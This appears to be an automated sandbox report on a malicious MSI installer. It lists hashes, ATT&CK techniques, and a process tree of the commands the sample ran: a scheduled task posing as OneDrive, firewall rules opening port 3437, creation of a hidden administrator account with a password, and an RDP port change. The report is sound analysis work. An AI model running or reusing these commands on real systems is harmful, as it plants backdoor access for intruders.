7e7d377140a146065c91c271e97dff7bb94f4b42245f1fba4dd2899271281912

Analysis

max time kernel
109s
max time network
109s
platform
windows7_x64
resource
win7-en-20211208
submitted
21-12-2021 17:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

seucartao0021 bdpk7zuq ju1ej9.msi
Size

4.0MB
MD5

8a53e2cb70a3967f721059d146e7ac4c
SHA1

429614ea9a6067160470aa5e101bb33b862deb80
SHA256

7e7d377140a146065c91c271e97dff7bb94f4b42245f1fba4dd2899271281912
SHA512

5ce3076109b4220de0e996eb91addeefeb9c0c9a19b0434b9858c18b69c88151ac8478402ad13efe6c791bb0771dcfec4f7fcc231cb199f7c334fb9c550d6e5d

Score

8^/10

evasion persistence

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	988	MsiExec.exe
4	988	MsiExec.exe

Executes dropped EXE 2 IoCs

pid	Process
612	HhsVSyqBnmZk.exe
1208	IVJLAJRj.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LxMsvCUwKRRB.lnk	MsiExec.exe

Loads dropped DLL 23 IoCs

pid	Process
988	MsiExec.exe
988	MsiExec.exe
988	MsiExec.exe
988	MsiExec.exe
988	MsiExec.exe
612	HhsVSyqBnmZk.exe
612	HhsVSyqBnmZk.exe
612	HhsVSyqBnmZk.exe
612	HhsVSyqBnmZk.exe
612	HhsVSyqBnmZk.exe
612	HhsVSyqBnmZk.exe
612	HhsVSyqBnmZk.exe
612	HhsVSyqBnmZk.exe
612	HhsVSyqBnmZk.exe
612	HhsVSyqBnmZk.exe
612	HhsVSyqBnmZk.exe
1208	IVJLAJRj.exe
1208	IVJLAJRj.exe
1208	IVJLAJRj.exe
1208	IVJLAJRj.exe
1208	IVJLAJRj.exe
1208	IVJLAJRj.exe
1020	Process not Found

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	IVJLAJRj.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Terminal Service 21122021\rdpwrap.dll	IVJLAJRj.exe
File created	C:\Program Files\Terminal Service 21122021\rdpwrap.ini	IVJLAJRj.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File created	C:\Windows\Installer\f75b7ea.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f75b7ea.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBA6A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBB27.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI145E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB8B5.tmp	msiexec.exe
File created	C:\Windows\Installer\f75b7ec.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\f75b7ec.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1626.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
580	schtasks.exe

Runs net.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	6	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
268	msiexec.exe
268	msiexec.exe
612	HhsVSyqBnmZk.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
1020	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1776	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1776	msiexec.exe
Token: SeRestorePrivilege	268	msiexec.exe
Token: SeTakeOwnershipPrivilege	268	msiexec.exe
Token: SeSecurityPrivilege	268	msiexec.exe
Token: SeCreateTokenPrivilege	1776	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1776	msiexec.exe
Token: SeLockMemoryPrivilege	1776	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1776	msiexec.exe
Token: SeMachineAccountPrivilege	1776	msiexec.exe
Token: SeTcbPrivilege	1776	msiexec.exe
Token: SeSecurityPrivilege	1776	msiexec.exe
Token: SeTakeOwnershipPrivilege	1776	msiexec.exe
Token: SeLoadDriverPrivilege	1776	msiexec.exe
Token: SeSystemProfilePrivilege	1776	msiexec.exe
Token: SeSystemtimePrivilege	1776	msiexec.exe
Token: SeProfSingleProcessPrivilege	1776	msiexec.exe
Token: SeIncBasePriorityPrivilege	1776	msiexec.exe
Token: SeCreatePagefilePrivilege	1776	msiexec.exe
Token: SeCreatePermanentPrivilege	1776	msiexec.exe
Token: SeBackupPrivilege	1776	msiexec.exe
Token: SeRestorePrivilege	1776	msiexec.exe
Token: SeShutdownPrivilege	1776	msiexec.exe
Token: SeDebugPrivilege	1776	msiexec.exe
Token: SeAuditPrivilege	1776	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1776	msiexec.exe
Token: SeChangeNotifyPrivilege	1776	msiexec.exe
Token: SeRemoteShutdownPrivilege	1776	msiexec.exe
Token: SeUndockPrivilege	1776	msiexec.exe
Token: SeSyncAgentPrivilege	1776	msiexec.exe
Token: SeEnableDelegationPrivilege	1776	msiexec.exe
Token: SeManageVolumePrivilege	1776	msiexec.exe
Token: SeImpersonatePrivilege	1776	msiexec.exe
Token: SeCreateGlobalPrivilege	1776	msiexec.exe
Token: SeRestorePrivilege	268	msiexec.exe
Token: SeTakeOwnershipPrivilege	268	msiexec.exe
Token: SeRestorePrivilege	268	msiexec.exe
Token: SeTakeOwnershipPrivilege	268	msiexec.exe
Token: SeRestorePrivilege	268	msiexec.exe
Token: SeTakeOwnershipPrivilege	268	msiexec.exe
Token: SeRestorePrivilege	268	msiexec.exe
Token: SeTakeOwnershipPrivilege	268	msiexec.exe
Token: SeRestorePrivilege	268	msiexec.exe
Token: SeTakeOwnershipPrivilege	268	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1400	WMIC.exe
Token: SeSecurityPrivilege	1400	WMIC.exe
Token: SeTakeOwnershipPrivilege	1400	WMIC.exe
Token: SeLoadDriverPrivilege	1400	WMIC.exe
Token: SeSystemProfilePrivilege	1400	WMIC.exe
Token: SeSystemtimePrivilege	1400	WMIC.exe
Token: SeProfSingleProcessPrivilege	1400	WMIC.exe
Token: SeIncBasePriorityPrivilege	1400	WMIC.exe
Token: SeCreatePagefilePrivilege	1400	WMIC.exe
Token: SeBackupPrivilege	1400	WMIC.exe
Token: SeRestorePrivilege	1400	WMIC.exe
Token: SeShutdownPrivilege	1400	WMIC.exe
Token: SeDebugPrivilege	1400	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1400	WMIC.exe
Token: SeRemoteShutdownPrivilege	1400	WMIC.exe
Token: SeUndockPrivilege	1400	WMIC.exe
Token: SeManageVolumePrivilege	1400	WMIC.exe
Token: 33	1400	WMIC.exe
Token: 34	1400	WMIC.exe
Token: 35	1400	WMIC.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1776	msiexec.exe
988	MsiExec.exe
1776	msiexec.exe

Suspicious use of WriteProcessMemory 53 IoCs

description	pid	Process	procid_target
PID 268 wrote to memory of 988	268	msiexec.exe	28
PID 268 wrote to memory of 988	268	msiexec.exe	28
PID 268 wrote to memory of 988	268	msiexec.exe	28
PID 268 wrote to memory of 988	268	msiexec.exe	28
PID 268 wrote to memory of 988	268	msiexec.exe	28
PID 268 wrote to memory of 988	268	msiexec.exe	28
PID 268 wrote to memory of 988	268	msiexec.exe	28
PID 988 wrote to memory of 1400	988	MsiExec.exe	29
PID 988 wrote to memory of 1400	988	MsiExec.exe	29
PID 988 wrote to memory of 1400	988	MsiExec.exe	29
PID 988 wrote to memory of 1400	988	MsiExec.exe	29
PID 612 wrote to memory of 1584	612	HhsVSyqBnmZk.exe	33
PID 612 wrote to memory of 1584	612	HhsVSyqBnmZk.exe	33
PID 612 wrote to memory of 1584	612	HhsVSyqBnmZk.exe	33
PID 612 wrote to memory of 1584	612	HhsVSyqBnmZk.exe	33
PID 1584 wrote to memory of 580	1584	cmd.exe	35
PID 1584 wrote to memory of 580	1584	cmd.exe	35
PID 1584 wrote to memory of 580	1584	cmd.exe	35
PID 1584 wrote to memory of 580	1584	cmd.exe	35
PID 612 wrote to memory of 1208	612	HhsVSyqBnmZk.exe	36
PID 612 wrote to memory of 1208	612	HhsVSyqBnmZk.exe	36
PID 612 wrote to memory of 1208	612	HhsVSyqBnmZk.exe	36
PID 612 wrote to memory of 1208	612	HhsVSyqBnmZk.exe	36
PID 1208 wrote to memory of 1508	1208	IVJLAJRj.exe	40
PID 1208 wrote to memory of 1508	1208	IVJLAJRj.exe	40
PID 1208 wrote to memory of 1508	1208	IVJLAJRj.exe	40
PID 1208 wrote to memory of 1508	1208	IVJLAJRj.exe	40
PID 1208 wrote to memory of 1756	1208	IVJLAJRj.exe	42
PID 1208 wrote to memory of 1756	1208	IVJLAJRj.exe	42
PID 1208 wrote to memory of 1756	1208	IVJLAJRj.exe	42
PID 1208 wrote to memory of 1756	1208	IVJLAJRj.exe	42
PID 1208 wrote to memory of 1556	1208	IVJLAJRj.exe	44
PID 1208 wrote to memory of 1556	1208	IVJLAJRj.exe	44
PID 1208 wrote to memory of 1556	1208	IVJLAJRj.exe	44
PID 1208 wrote to memory of 1556	1208	IVJLAJRj.exe	44
PID 1556 wrote to memory of 1468	1556	net.exe	46
PID 1556 wrote to memory of 1468	1556	net.exe	46
PID 1556 wrote to memory of 1468	1556	net.exe	46
PID 1208 wrote to memory of 876	1208	IVJLAJRj.exe	47
PID 1208 wrote to memory of 876	1208	IVJLAJRj.exe	47
PID 1208 wrote to memory of 876	1208	IVJLAJRj.exe	47
PID 1208 wrote to memory of 876	1208	IVJLAJRj.exe	47
PID 876 wrote to memory of 540	876	net.exe	49
PID 876 wrote to memory of 540	876	net.exe	49
PID 876 wrote to memory of 540	876	net.exe	49
PID 1208 wrote to memory of 1864	1208	IVJLAJRj.exe	50
PID 1208 wrote to memory of 1864	1208	IVJLAJRj.exe	50
PID 1208 wrote to memory of 1864	1208	IVJLAJRj.exe	50
PID 1208 wrote to memory of 1864	1208	IVJLAJRj.exe	50
PID 1208 wrote to memory of 1168	1208	IVJLAJRj.exe	52
PID 1208 wrote to memory of 1168	1208	IVJLAJRj.exe	52
PID 1208 wrote to memory of 1168	1208	IVJLAJRj.exe	52
PID 1208 wrote to memory of 1168	1208	IVJLAJRj.exe	52

C:\Windows\system32\msiexec.exe
msiexec.exe /I "C:\Users\Admin\AppData\Local\Temp\seucartao0021 bdpk7zuq ju1ej9.msi"
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1776

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:268
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding B6B196D4AD89514D532D520E240EDD86
  2⤵
  - Blocklisted process makes network request
  - Drops startup file
  - Loads dropped DLL
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:988
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" process call create 'C:\Users\Admin\lokRfozXIWxY\HhsVSyqBnmZk.exe'
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1400

C:\Users\Admin\lokRfozXIWxY\HhsVSyqBnmZk.exe
C:\Users\Admin\lokRfozXIWxY\HhsVSyqBnmZk.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:612
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /TN "OneDrive " /TR C:\\Users\Admin\lokRfozXIWxY\HhsVSyqBnmZk.exe /SC minute /MO 2 /IT /RU %USERNAME%
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1584
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "OneDrive " /TR C:\\Users\Admin\lokRfozXIWxY\HhsVSyqBnmZk.exe /SC minute /MO 2 /IT /RU Admin
    3⤵
    - Creates scheduled task(s)
    PID:580
- C:\Users\Admin\WyFqt 8KJF\IVJLAJRj.exe
  "C:\Users\Admin\WyFqt 8KJF\IVJLAJRj.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies WinLogon
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:1208
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3437 profile=any action=allow
    3⤵
    PID:1508
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=udp localport=3437 profile=any action=allow
    3⤵
    PID:1756
- - C:\Windows\system32\net.exe
    net user Administrat0r "123mudar" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1556
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user Administrat0r "123mudar" /add
      4⤵
      PID:1468
- - C:\Windows\system32\net.exe
    net localgroup Administradores Administrat0r /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:876
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administradores Administrat0r /add
      4⤵
      PID:540
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3437 profile=any action=allow
    3⤵
    PID:1864
- - C:\Windows\System32\reg.exe
    C:\Windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3437 /f
    3⤵
    PID:1168

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:1644

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:1604

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/612-93-0x00000000003B0000-0x00000000003B1000-memory.dmp

Filesize
4KB

Download
memory/612-88-0x0000000000690000-0x0000000000867000-memory.dmp

Filesize
1.8MB

Download
memory/612-92-0x00000000029B1000-0x0000000002E37000-memory.dmp

Filesize
4.5MB

Download
memory/988-56-0x0000000076C61000-0x0000000076C63000-memory.dmp

Filesize
8KB

Download
memory/988-63-0x0000000000670000-0x0000000000671000-memory.dmp

Filesize
4KB

Download
memory/1208-118-0x0000000000240000-0x0000000000243000-memory.dmp

Filesize
12KB

Download
memory/1208-112-0x00000000744B0000-0x0000000074507000-memory.dmp

Filesize
348KB

Download
memory/1208-119-0x0000000000240000-0x0000000000244000-memory.dmp

Filesize
16KB

Download
memory/1208-116-0x0000000000230000-0x0000000000234000-memory.dmp

Filesize
16KB

Download
memory/1208-106-0x0000000000CE0000-0x000000000101E000-memory.dmp

Filesize
3.2MB

Download
memory/1208-124-0x0000000003A21000-0x0000000003C7D000-memory.dmp

Filesize
2.4MB

Download
memory/1208-125-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/1208-117-0x00000000752A1000-0x00000000752A5000-memory.dmp

Filesize
16KB

Download
memory/1208-120-0x0000000075070000-0x0000000075098000-memory.dmp

Filesize
160KB

Download
memory/1208-115-0x0000000074510000-0x000000007451C000-memory.dmp

Filesize
48KB

Download
memory/1208-114-0x0000000000230000-0x000000000024C000-memory.dmp

Filesize
112KB

Download
memory/1604-144-0x0000000002760000-0x0000000002761000-memory.dmp

Filesize
4KB

Download
memory/1644-142-0x00000000027C0000-0x00000000027C1000-memory.dmp

Filesize
4KB

Download
memory/1776-53-0x000007FEFC321000-0x000007FEFC323000-memory.dmp

Filesize
8KB

Download